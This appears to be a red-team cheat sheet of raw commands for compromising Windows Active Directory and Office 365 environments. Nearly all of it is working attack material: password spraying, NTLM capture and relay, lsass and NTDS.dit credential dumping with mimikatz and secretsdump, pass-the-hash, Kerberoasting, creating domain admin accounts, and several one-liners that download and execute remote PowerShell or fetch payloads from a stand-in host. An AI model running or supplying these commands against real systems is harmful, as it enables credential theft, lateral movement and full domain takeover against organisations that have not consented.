https://github.com/dcsync/recontools
python3 office365userenum.py -u test.txt -v -o output.txt --password 'Password1
Enumeration (opsec safe):
python o365creeper.py -f test.txt
https://github.com/0xZDH/o365spray
https://crt.sh
%.blah.com
python3 ./domainhunter.py -r 1000
PS C:\> Invoke-PowerMeta -TargetDomain targetdomain.com
Invoke-UsernameHarvestOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Threads 1 -OutFile owa-valid-users.txt
Invoke-DomainHarvestOWA -ExchHostname mail.domain.com
Invoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Fall2016 -Threads 15 -OutFile owa-sprayed-creds.txt
theharvester -d blah.com -l 1000 -b linkedin
https://github.com/m8r0wn/CrossLinked
Regex to extract emails
grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b"
cat linkedin.txt | tr , '\n' | sed 's/\”//g' | awk '/"title":{"textDirection":"FIRST_STRONG"/{getline; print}'
awk '=FS tolower(substr(,1,1)$NF)' linkedin-user-list.txt | awk '{ print }'
awk '{print $0,tolower(substr($1,1,1)$NF)}' names.txt
Handy if you have generated a list from linkedin or a list of usernames.
nmap -p 88 1.1.1.1 --script krb5-enum-users --script-args krb5-enum-users.realm="DOMAIN"
username list is located at /usr/local/share/nmap/nselib/data/usernames.lst in Kali
Still works on infra that was upgraded from 2k, 2k3.
net use \\IP_ADDRESS\ipc$ "" /user:""
Use enum4linux, enum or Dumpsec following the null session setup.
https://bitbucket.org/grimhacker/gpppfinder/src/master/
findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
https://github.com/dafthack/HostRecon
Privesc checks: https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation
Grab NetNTLM hashes off the network
responder -I eth0
responder -I eth0 --wpad -b -f -F
sort -m *.txt | uniq -d | awk '!/\$/'
john SMB-NTLMv2-Client-172.20.22.217.txt --wordlist=/root/passwords.txt
Use hashcat on a more powerful box. This is only for easy wins.
ntlmrelayx.py -tf targets.txt -c <insert Empire Powershell launcher>
python mitm6.py -d blah.local
impacket-smbserver hiya /tmp/ -smb2support
$Company1 $Season$Year Password1 Password! Welcome1 Welcome! Welcome@123 P@55word P@55w0rd $month$year
hydra -L users.txt -p Password1 -m 'D' 172.20.11.55 smbnt -V
@FOR /F %n in (users.txt) DO @FOR /F %p in (pass.txt) DO @net use \\DOMAINCONTROLLER\IPC$ /user:DOMAIN\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\DOMAINCONTROLLER\IPC$ > NUL
net view /domain > systems.txt
@FOR /F %s in (systems.txt) DO @net use \\%s\C$ /user:domain\username Password 1>NUL 2>&1 && @echo %s>>admin_access.txt && @net use /delete \\%s\C$ > NUL
Invoke-DomainPasswordSpray -Password Spring2017
When you have an initial set of compromised creds run these from a Virtual Machine to place foothold on network as domain user.
C:\runas.exe /netonly /user:BLAHDOMAIN\blahuser cmd.exe
runas /netonly /user:[email protected] "mmc %SystemRoot%\system32\dsa.msc
Make sure you use the FQDN of the domain and set the reg key as below.
nltest /dsgetdc:domain.local
To change DC via registry to point at domain being tested:
HKEY_LOCAL_MACHINE SYSTEM CurrentControlSet Services Netlogon Parameters “SiteName“ > DC1.domain.com
net use \\10.0.0.1\ipc$ /user:domain.local\username password
net users /domain
net group /domain "Domain Admins"
net accounts /domain
Note that the above commands do not work with runas. Below PowerView functions will work with runas.
. .\PowerView.ps1
Get-UserProperty -Properties samaccountname
Get-NetGroupMember
Get-DomainPolicy
Search shares and files using Invoke-FileFinder and Invoke-ShareFinder
Run locally on non-domain joined machine (remember to add target domain to registry):
..\BloodHound.ps1
Invoke-BloodHound
SharpHound.exe --CollectionMethod All
Useful when you have a remote shell.
powershell Set-ExecutionPolicy RemoteSigned
powershell -command "& { . C:\BloodHound.ps1; Invoke-BloodHound }"
Use this when you cannot copy BloodHound.ps1 over to target.
powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/PowerShell/BloodHound.ps1'); Invoke-BloodHound"
SharpPick.exe -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1'); Invoke-BloodHound"
SharpPick-64.exe -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1'); Invoke-AllChecks"
.\godditest-windows-amd64.exe -username=testuser -password="testpass!" -domain="test.local" -dc="dc.test.local" -unsafe
https://github.com/sense-of-security/ADRecon
Invoke-ShareFinder -CheckShareAccess -Verbose -Threads 20 | Out-File -Encoding Ascii interesting-shares.txt
Invoke-FileFinder -ShareList .\interesting-shares.txt -Verbose -Threads 20 -OutFile juicy_files.csv
docker run --rm -it -v /tmp/blah:/tmp/EyeWitness eyewitness --web --single https://www.google.com
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
crackmapexec smb 172.16.110.0/24
crackmapexec smb 172.16.110.154 -u Administrator -p Password1 -x 'ipconfig'
crackmapexec smb 172.16.110.154 -u Administrator -p Password1 --pass-pol
crackmapexec smb 172.16.110.154 -u Administrator -p Password1 -M mimikatz
crackmapexec smb 172.16.110.154 -u Administrator -p Password1 --sam
crackmapexec smb 172.16.110.154 -u Administrator -p Password1 --lsa
pth-winexe //10.0.0.1 -U DOMAINBLAH/blahuser%blahpassword cmd
pth-winexe //10.0.0.1 -U DOMAINBLAH/blahuser%hash cmd
Impacket psexec.py to boxes (not opsec safe) - does cleanup after but leaves logs after installing and running service.
psexec.py user@IP
psexec.py user@IP -hashes ntlm:hash
wmiexec.py domain/user@IP
wmiexec.py domain/user@IP -hashes ntlm:hash
python smbclient.py domain/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:blah
Using mimikatz:
privilege::debug
sekurlsa::pth /user:<user name> /domain:<domain name> /ntlm:<the user's ntlm hash> /run:"mstsc.exe /restrictedadmin"
If disabled:
sekurlsa::pth /user:<user name> /domain:<domain name> /ntlm:<the user's ntlm hash> /run:powershell.exe
Enter-PSSession -Computer <Target>
New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force
Invoke-WMIExec -Target blah -Username blah -Hash NTLMHASH -Command blah
samdump2 SYSTEM SAM > hashes.txt
C:\> reg.exe save hklm\sam c:\temp\sam.save
C:\> reg.exe save hklm\security c:\temp\security.save
C:\> reg.exe save hklm\system c:\temp\system.save
secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
pwdump system sam
C:\> procdump.exe -accepteula -ma lsass.exe c:\lsass.dmp 2>&1
C:\> mimikatz.exe log "sekurlsa::minidump lsass.dmp" sekurlsa::logonPasswords exit
C:\>mini.exe
https://github.com/b4rtik/ATPMiniDump
mimikatz # privilege::debug
mimikatz # sekurlsa::logonPasswords full
impacket-secretsdump Administrator@ip
impacket-secretsdump Administrator@ip -hashes ntlm:hash
To find where NTDS is run the below:
reg.exe query hklm\system\currentcontrolset\services\ntds\parameters
C:\vssadmin list shadows
C:\vssadmin create shadow /for=C:
copy \\? \GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\ntds\ntds.dit .
copy \\? \GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SYSTEM .
copy \\? \GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SAM .
secretsdump.py -system system.save -ntds ntds.dit local -just-dc-ntlm
remove machine accounts
grep -a -F ':::' hashes.txt | grep -av '$:' > finalhashes.txt
only passwords for pipal
cut -f 3 -d ':' cracked_with_users_enabled.txt
vssadmin delete shadows /shadow={cd534584-a272-44ab-81e1-ab3f5fbe9b29}
godumpsecrets for faster
C:\>ntdsutil
ntdsutil: activate instance ntds
ntdsutil: ifm
ifm: create full c:\pentest
ifm: quit
ntdsutil: quit
ntdsutil
ntdsutil: snapshot
ntdsutil: list all
ntdsutil: create
snapshot: mount 1
Cleanup snapshots:
snapshot: list all
snapshot: unmount 1
snapshot: list all
snapshot: delete 1
Add user to local admin and domain admin
net user username password /ADD /DOMAIN
net group "Domain Admins" username /ADD /DOMAIN
net user username password /ADD
net localgroup Administrators username /ADD
If powershell not enabled or unable to run BloodHound this script will find admins.
#!/bin/sh
for ip in $(cat ip.txt);do
pth-winexe -U Admin%hash //$ip "ipconfig"
pth-winexe -U Admin%hash //$ip "tasklist /v"
done
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat
https://raw.githubusercontent.com/xan7r/kerberoast/master/autokerberoast.ps1
Invoke-AutoKerberoast
python autoKirbi2hashcat.py ticketfilefromautoinvokekerberoast
IEX (New-Object Net.WebClient).DownloadString('https://github.com/EmpireProject/Empire/raw/master/data/module_source/credentials/Invoke-Kerberoast.ps1'); Invoke-Kerberoast
sudo apt-get install nvidia-367
sudo nvidia-smi
reboot
sudo hashcat -I
hashcat -m 13100 kerb.txt ~/Downloads/realuniq.lst
https://github.com/kfosaaen/Get-LAPSPasswords/blob/master/Get-LAPSPasswords.ps1
IEX (New-Object Net.WebClient).DownloadString('https://github.com/PowerShellEmpire/PowerTools/raw/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks
python smbserver.py test /root/tools
python -m SimpleHTTPServer <port>
https://blog.cobaltstrike.com/2017/02/06/high-reputation-redirectors-and-domain-fronting/ https://signal.org/blog/doodles-stickers-censorship/ https://www.securityartwork.es/2017/01/24/camouflage-at-encryption-layer-domain-fronting/ https://trac.torproject.org/projects/tor/wiki/doc/meek http://bryceboe.com/2012/03/12/bypassing-gogos-inflight-internet-authentication/
SharpPick.exe -d "http://blah/blah.ps1"
wmic.exe os get /format:"http://blah/foo.xsl"
https://www.mdsec.co.uk/2018/03/payload-generation-using-sharpshooter/
python SharpShooter.py --stageless --dotnetver 2 --payload js --output foo --rawscfile ./output/payload.bin --smuggle --template mcafee --com xslremote --awlurl http://blah/foo.xsl
user to which box the user has localadmin
MATCH (u:User)-[r:MemberOf|:AdminTo*1..]->(c:Computer) return u.name, collect(c.name)
List of DAs
Match p=(u:User)-[:MemberOf]->(g:Group) WHERE g.name= "DOMAIN [email protected]" return u.displayname